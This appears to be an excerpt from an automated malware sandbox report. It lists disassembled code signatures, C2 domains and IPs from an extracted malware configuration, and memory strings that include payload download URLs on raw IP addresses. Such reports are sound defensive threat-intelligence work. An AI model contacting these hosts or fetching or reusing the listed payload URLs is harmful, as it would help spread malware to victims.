                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FFD116
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]9_2_00FFAAC0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]9_2_00FD8A50
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ebx, byte ptr [edx]9_2_01006210
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00FF83D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]9_2_00FD73D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]9_2_00FD73D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h9_2_0100CA40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]9_2_00FEEB80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]9_2_00FDAB40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edx, ecx9_2_00FE8B1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FEC300
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00FE4CA0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then dec edx9_2_0100FD70
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov word ptr [eax], cx9_2_00FE747D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov word ptr [edx], di9_2_00FE747D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]9_2_00FFC465
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFC465
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]9_2_0100EDC1
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFDDFF
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edi, ecx9_2_00FFA5B6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]9_2_00FEB57D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edx, ecx9_2_00FF6D2E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h9_2_00FF8528
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edx, ecx9_2_00FF9E80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov byte ptr [ebx], al9_2_00FFDE07
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then dec edx9_2_0100FE00
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then jmp edx9_2_00FF37D6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov dword ptr [esp+20h], eax9_2_00FD9780
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov word ptr [eax], cx9_2_00FE6F52
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]9_2_00FF7740
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then jmp eax9_2_00FF9739
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]9_2_00FF5F1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then mov ecx, eax9_2_00FFBF13
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]9_2_010106F0
                    Source: firefox.exeMemory has grown: Private usage: 1MB later: 202MB

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: pancakedipyps.click
                    Source: Malware configuration extractorURLs: tentabatte.lat
                    Source: Malware configuration extractorURLs: talkynicer.lat
                    Source: Malware configuration extractorURLs: slipperyloo.lat
                    Source: Malware configuration extractorURLs: bashfulacid.lat
                    Source: Malware configuration extractorURLs: manyrestro.lat
                    Source: Malware configuration extractorURLs: shapestickyr.lat
                    Source: Malware configuration extractorURLs: wordyfindy.lat
                    Source: Malware configuration extractorURLs: curverpluch.lat
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: Malware configuration extractorURLs: 147.45.44.224:1912
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B0E0C0 recv,recv,recv,recv,0_2_00B0E0C0
                    Source: 7620ab885d.exe, 7620ab885d.exe, 00000009.00000003.2367952280.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                    Source: skotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                    Source: skotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exeed.exeg
                    Source: skotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exehp
                    Source: skotes.exe, 00000005.00000003.2948994476.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exe
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: b285303eae.exe, 0000001B.00000003.2788880393.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: 7ddd2a748c.exe, 00000013.00000003.2407620521.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                    Source: 7620ab885d.exe, 00000009.00000002.2490488887.0000000005E89000.00000002.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366828204.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.0000000005785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
